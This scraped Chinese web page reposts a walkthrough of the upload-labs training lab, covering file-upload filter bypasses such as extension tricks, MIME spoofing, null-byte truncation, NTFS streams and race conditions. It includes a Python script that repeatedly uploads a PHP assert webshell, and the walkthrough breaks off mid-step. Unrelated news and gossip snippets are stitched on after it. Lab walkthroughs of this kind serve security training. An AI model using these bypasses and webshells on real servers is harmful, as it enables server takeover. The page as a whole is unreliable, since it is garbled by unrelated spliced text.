范文健康探索娱乐情感热点
投稿投诉
热点动态
科技财经
情感日志
励志美文
娱乐时尚
游戏搞笑
探索旅游
历史星座
健康养生
美丽育儿
范文作文
教案论文
国学影视

upload20)通关教程

  1、Pass-01-js检查
  查看代码后端没有对上传文件进行过滤,且上传php木马代替图片:没有后端交互,只有前端;
  修改前端代码;先点击浏览选中php木马文件,将文件上传位置代码内容中的onsubmit中的内容删除(删除return checkFile()),然后点击上传文件就显示木马文件上传成功;
  2、Pass-02- content-type(MIME文件类型)
  从代码中发现只对上传文件的Content-Type类型判断,通过burp抓包,修改Content-Type类型为图片类型进行绕过,就可以上传成功;
  3、Pass-03-.php3和.php5后缀绕过
  从代码中可看出只允许上传asp、aspx、php和jsp后缀文件,但有些版本支持php3和php5;可通过这个漏洞上传木马;就可直接将木马文件后缀改为php3或php5, 完成木马文件上传:
  4、pass-04-PHP 和 Windows特性绕过
  分析代码发现,这里对上传的后缀名的判断增加了,php3.php5....已经不允许上传,利用PHP 和 Windows环境的叠加特性,以下符号在正则匹配时的相等性:
  利用PHP 和 Windows环境的叠加特性,以下符号在正则匹配时的相等性: 双引号" = 点号.
  大于符号> = 问号?
  小于符号< = 星号*
  注意,在windows直接修改文件名称,肯定是不让你加冒号的,所以我们先以图片的格式上传,然后抓
  包,修改文件名称,加上冒号,上传一个名为 tj.php:.jpg 的文件
  上传上去之后的效果,由于文件名称不允许出现冒号,所有windows就将冒号和后面的字符都去掉了,就剩下123.php了,但是有个点就是,文件为0kb;
  然后将文件名改为 tj.< 或 tj.<<< 或 tj.>>> 或 tj.>>< 后再次上传,重写 tj.php 文件内容,Webshell代码就会写入原来的 tj.php 空文件中。
  5、pass-05-大小写混合绕过
  但是 $file_ext = strtolower($file_ext); //转换为小写 这一句没有了,我们就可以使用,文件名后缀大小写混合绕过,把x.php改为x.phP来上传:
  6、pass-06&07-空格和点配合绕过
  从代码中看出将上传的文件名都改为小写了,利用Windows系统的文件名特性。用burpsuite抓包修改,将上传的文件名shell.php文件名最后增加空格和点,写成shell.php .,上传后保存在Windows系统上的文件名最后的一个.会被去掉,实际上保存的文件名就是shell.php;
  7、pass08-基于文件流特性::DATA绕过
  从代码中看,少了 $file_ext = str_ireplace(‘::$DATA‘, ‘‘, $file_ext);//去除字符串::$DATA这一句,我们可以采用Windows文件流特性绕过,文件名改为shell.php::$DATA, 上传成功后保存的文件名其实是shell.php:
  8、pass09-点空格点绕过
  原理同Pass-06,上传文件名后加上点+空格+点,改为 shell.php. . (php后面加点空格点)就可以绕过,上传文件;
  9、pass10-双写绕过
  从代码中发现,由于 $file_name = str_ireplace($deny_ext,"", $file_name); 只对文件后缀名进行一次过滤,可通过双写文件名绕过,文件名改成shell.pphphp:
  10、pass11&19-%00截断绕过
  这个属于白名单绕过,这是php语言自身的问题,php低版本存在的漏洞(这一关上传前需将phpstudy中php版本修改到5.3.4版本以下才能实现,同时把magic_quotes_gpc关闭)。
  分析代码,这是以时间戳的方式对上传文件进行命名,使用上传路径名%00截断绕过,不过这需要对文件有足够的权限,比如说创建文件夹,上传的文件名写成shell.jpg, save_path改成../upload/shell.php%00 (shell.php%00.jpg经过url转码后会变为shell.php00.jpg),最后保存下来的文件就是shell.php:
  11、pass12-0x00绕过
  原理同Pass-11,上传路径0x00绕过。利用Burpsite的Hex功能将save_path改成../upload/shell.php【二进制00】形式(这里的二进制00先在php后面加个空格,再再hex中将空格的二进制数20改为00,同时将filename后面的shell.php的后缀php改为jpg,就可以完成上传绕过):
  12、pass13&14&15-图片文件头绕过
  绕过文件头检查,添加GIF图片的文件头GIF89a,绕过GIF图片检查。
  13、pass16-二次渲染绕过
  原理:是将用户上传过来的文件数据重新读取保存到另外一个文件中,那么在读取写入的过程中,将特殊的数据剔除掉了。将一个正常显示的图片,上传到服务器。寻找图片被渲染后与原始图片部分对比仍然相同的数据块部分,将Webshell代码插在该部分,然后上传。具体实现需要自己编写Python程序或者从github上找些可绕过的图片马,人工尝试基本是不可能构造出能绕过渲染函数的图片webshell的。
  使用可绕过二次渲染图片马上传绕过:
  14、pass17-时间竞争绕过
  利用条件竞争删除文件时间差绕过。使用命令pip install hackhttp安装hackhttp模块,运行下面的Python代码即可。如果还是删除太快,可以适当调整线程并发数。
  #!/usr/bin/env python
  #coding:utf-8
  #Build By LandGrey
  import hackhttp
  from multiprocessing.dummy import Pool as ThreadPool
  def upload(lists):
  hh = hackhttp.hackhttp()
  raw = """POST /upload-labs/Pass-17/index.php HTTP/1.1
  Host: 127.0.0.1
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:49.0) Gecko/20100101 Firefox/49.0
  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
  Accept-Encoding: gzip, deflate
  Referer: http://127.0.0.1/upload-labs/Pass-17/index.php
  Cookie: pass=17
  Connection: close
  Upgrade-Insecure-Requests: 1
  Content-Type: multipart/form-data; boundary=---------------------------6696274297634
  Content-Length: 341
  -----------------------------6696274297634
  Content-Disposition: form-data; name="upload_file"; filename="17.php"
  Content-Type: application/octet-stream
  <?php assert($_POST["LandGrey"])?>
  -----------------------------6696274297634
  Content-Disposition: form-data; name="submit"
  上传
  -----------------------------6696274297634--
  """
  code, head, html, redirect, log = hh.http("http://127.0.0.1/upload-labs/Pass-17/index.php", raw=raw)
  print(str(code) + "r")
  pool = ThreadPool(10)
  pool.map(upload, range(10000))
  pool.close()
  pool.join()
  一方面不断上传文件,一方面不断访问上传的文件,那么我们就可以在它删除木马文件之前的时间差来访问执行木马。这里使用两个发包器,一个包是上传我们test.php的包,一个是访问我们上传test.php后的地址,不停的访问这个文件。每一个测试器的参数都设置的高一些,3000个包,100个线程。 然后我们发现tj.php被访问了,并且执行了,生成了qing.php文件(这种方面短时间内不一定能成功,看运气):
  15、pass18-条件竞争绕过
  利用上传重命名竞争+Apache解析漏洞,成功绕过。
  上传名字为18.php.7Z的文件(因为该题的源代码中支持这个类型文件的上传,有白名单),快速重复提交该数据包,会提示文件已经被上传,但没有被重命名。apache解析文件名称的时候,是从右往左解析的,当它看到不认识的扩展名时,他就找前面的扩展名作为文件扩展名,这样它就当成了18.php了。 直接上传,我们通过抓包工具看一下
  你注意观察upload文件夹,注意这是网站根目录的那个upload文件夹,不是根目录中的那个upload文件夹昂,发现这个文件上传上去之后,被重命名了。所以,我们现在其实玩的也是时间竞争。我们如果将包发到burp的测试器中,发送3000个包,100个线程发送,那么有些文件是没有来得及被重命名的,但是我们直接访问这个文件的时候你发现其实文件还是不能被解析的:
  因为我们使用的phpstudy中的apache是没有这个漏洞的了,所以看不出效果。但是通过其他方式搭建的apache,它是有一个漏洞的,因为apache能解upload1.php.7z的,自动解析成了php文件。
  快速提交上面的数据包,可以让文件名字不被重命名上传成功。 然后利用Apache的解析漏洞,即可获得shell;
  16、pass20-代码审计
  解题思路:这个思路大家自己看看就行了,我们直接看演示效果,也就是解题步骤。
  文件命名规则:$file_name = reset($file) . "." . $file[count($file) - 1];
  reset():将内部指针指向数组中的第一个元素,并输出。
  end():将内部指针指向数组中的最后一个元素,并输出。
  $file = empty($_POST["save_name"]) ? $_FILES["upload_file"]["name"] :
  $_POST["save_name"];如果save_name不为空则file为save_name,否则file为filename
  if (!is_array($file))判断如果file不是数组则以’.’分组
  文件名命名规则$file_name = reset($file) . "." . $file[count($file) - 1];
  我们POST传入一个save_name列表:["info20.php", "", "jpg"],此时
  empty($_POST["save_name"]) 为假则file为save_name,所以由$ext = end($file);为jpg可以通
  过后缀名判断(判断结束后最后一个元素jpg弹出),并且最终文件名组装为upload20.php.
  解题步骤:上传包数据为,那个1.jpg其实是1.php改的名字,为了上传的时候通过前端js校验而已,里面有木马, 重点要通过后端校验:
  修改数据包:

赵心童横刀立马,枪挑霍师傅,会师小和尚决战紫禁之巅公元二零二一年十二月五日凌晨,2021年斯诺克英锦赛半决赛擂台,老拳师霍金斯霍师傅坐镇擂台,企图用老辣的经验阻止闯关者。凌晨时分,月色迷蒙,东方一匹白马披星戴月,追云赶露,只见座上徐杰比赵继伟只矮四公分,为什么老攻击徐杰?攻击徐杰的绝对不是徐杰的粉丝,而且不是广东队球迷。徐杰的能力也是有目共睹的,不管是奥运会落选赛还是世预赛,表现中规中矩,完全有能力入选国家队,他相比于赵继伟数据除了助攻都略胜一筹。国足内讧!韦世豪和李铁团队爆冲突,被足协开除,李霄鹏面临两难在李霄鹏确定出任国足主帅后,网络上关于中国足球的争论仍未消失,又有很多李铁执教时期的事情被曝光出来。名嘴董路透露,在刚刚过去的11月份12强赛中,此前一直是国足常客的韦世豪突然落选中国篮协选举姚明99连任,但他将被削权,将不是一人说了算据媒体报道,中国篮球协会将于月底举行第10届全国代表大会,届时将选举产生新一届领导班子。目前篮协领导班子由姚明担当篮协主席,还由多名地方篮球主席企业家教练员篮球界相关人员担任篮协副参考还有59天!他们纷纷对中国展开碰瓷式表演参考消息网12月7日报道(文唐立辛)随着默克尔卸任,德国新一届政府成员名单也已敲定,候任外长是绿党联合主席安娜莱娜贝尔伯克。都说外交要掌握分寸,但贝尔伯克还未上任,就已经因言语失当强者不争,智者不辩,贤者无为人这一生,说什么不如做什么,做什么不如什么都不做。幼稚的人,以为刁难了别人,炫耀了自己,就是本事。成熟的人,心如明镜,却又不言不语,在安静中走向远方。01hr强者收敛锋芒,不与人争被人瞧不起的时候,这样做远比翻脸有用人活一世会遇到各种各样的人。难免会遇到一些趾高气扬盛气凌人的人,总是对别人各种嘲讽鄙视。有的人,事业成功却能对人宽厚有礼。也有的人,即使身处谷底却仍旧心怀希望,不在意别人的目光,只山河令经典语录31。四季花常在,九洲事尽知。32。世上本无事,庸人自扰之。33。我知道,你想要这乌烟瘴气的人间,和这鬼蜮一同倾覆你想要这群贪名逐利丑态百出的人,都为其贪欲所噬你想要这浊世付之一炬房山一地藏有25亿年前地球变化的奥秘!一文读懂这里的传奇之处官地村地处房山世界地质公园周口店园区东北部,坐落于房山岩体与太平山向斜接触之地。现有村民174户,382人,虽村域面积不足1平方公里,但地质遗迹资源极其丰富,早在1963年北京地质字节跳动又拉了一波仇恨全员发红包,连被裁员工都不放过话说,今年临近很多,互联网大厂们都很低调,比如,陌陌往年的年会很大手笔,礼物也令人振奋,今年虽然每人还是照惯例发了个iPhone13,但整体的感觉是不如往年那么豪横了。再加上,许多深信大V荐股,数次遭套牢,女股民深陷交易强迫症,暴富心态入场反而是暴亏财联社(北京,记者陈俊岭)讯,短短几个小时,某大型社区一篇名为炒股一年,基金和股票亏掉150万的帖子就彻底火了,60多页跟帖和660多条评论,直接将它送上当天的十大热门话题之首。就
巅峰库里能否打爆欧文?看完16年总决赛交手数据,你就有答案了巅峰库里能否打爆欧文?看完16年总决赛交手数据,你就有答案了说起过去十年内最精彩的总决赛,2016年的骑勇大战必然首当其冲,那一年勇士队在全票MVP库里的带领下取得了73胜9负的历加内特谈心中首发5虎,乔丹邓肯詹姆斯奥尼尔全落选,杜兰特入选文聪古说球加内特近日做客节目时回答了网友的提问,在谈到他心中的首发5虎的时候,他也给出了自己的大名单,并给出了自己的理由,值得一提的是,乔丹邓肯詹姆斯奥尼尔这4个拥有3个或以上FM13连胜,15连败!勇士别大意,湖人别泄气,西部要变天了NBA新赛季已经开打一个月,30支球队轮番登场,几家欢喜几家愁。就拿东部来说,曾经三足鼎立的格局不复存在,篮网热火公牛奇才等球队并驾齐驱,都曾霸占过分区榜首的位置,反倒是雄鹿76人篮网逆转骑士迎3连胜!阿伦战旧主2015,哈登1414杜兰特27分11月23日,NBA常规赛结束了一场焦点战,篮网客场117112逆转骑士,迎来3连胜。这场比赛乔哈里斯莫布里等人缺阵,阿伦对阵旧主。比赛中骑士一度牢牢掌握比分优势,进入到末节前篮网整牙如整容?高圆圆杨颖成女神,郭碧婷变牙套脸猪鼻子斛珠夫人里的杨幂颜值下降了?同样戴着额饰的异域风造型,现在看来眼神有些憔悴,不如王昭君里的眼波流转灵气四溢。虽说随着年纪增长,眼神皮肤状态不如过去是再正常不过的事,但饭姐发现,杨幂人前毒舌,人后暖心,金星的清醒,打脸了多少虚情假意的人26年前的清明节那天,金星遵循自己从小就有的心愿,从一个男人变成了一个真正的女人,金星把手术的地点选在了北京香山医院,在当时难以遇见的时刻,张元导演用摄像机将全程记录下来,最后以纪谷歌Pixel6a渲染图惊艳亮相,Pixel5沦为白菜机创悲惨新纪录此前谷歌Pixel6系列已经正式上市,其靓丽的外观已经得到不少消费者的认可。现在91mobiles已经曝光了该系列手机中中高端Pixel6a的表现,展示了这款手机的外观设计。与此同范冰冰罕见现身,为弟弟范丞丞新片助阵,口罩遮半张脸仍惊艳路人日前,范丞丞白百何白客等人主演的新片门锁在北京举行首映礼。许久没在公开场合露面的范冰冰也罕见现身,为弟弟范丞丞加油助阵。当天,范冰冰跟乐华娱乐掌舵人杜华坐在一起,谈笑风生。由于杜华怀柔庙城1。2亿元打造铜牛影视小镇本报讯(记者武文娟通讯员王雪璐)利用疏整促腾退的储油罐老厂房等改造升级建设文创园区,怀柔区庙城镇被列入北京市保护利用老旧厂房拓展文化空间试点的两个项目铜牛影视小镇和北京果脯博物馆分周恩来多次到访,邓小平曾在此生活,一座法国小镇竟成中国革命先驱的栖息地在巴黎向南100公里的罗瓦河谷中部,有一座小桥流水鲜花点缀的城镇。四条河从这里流过,穿街越巷,追随塞纳河和罗瓦河而去。纵横交错的河流映射着天光,河上有131座小桥。慕名而来的人们,寂静岭的原型,一座燃烧了半个世纪的小镇,最长燃烧了6000年1962年5月27日,这是一个普通的春日周末,在美国宾夕法尼亚州起伏的山丘中,有一种叫森特勒利亚的煤矿小镇,居民们各自忙着手上的事,为第二天的阵亡的将士纪念日做准备。寂静岭为了迎接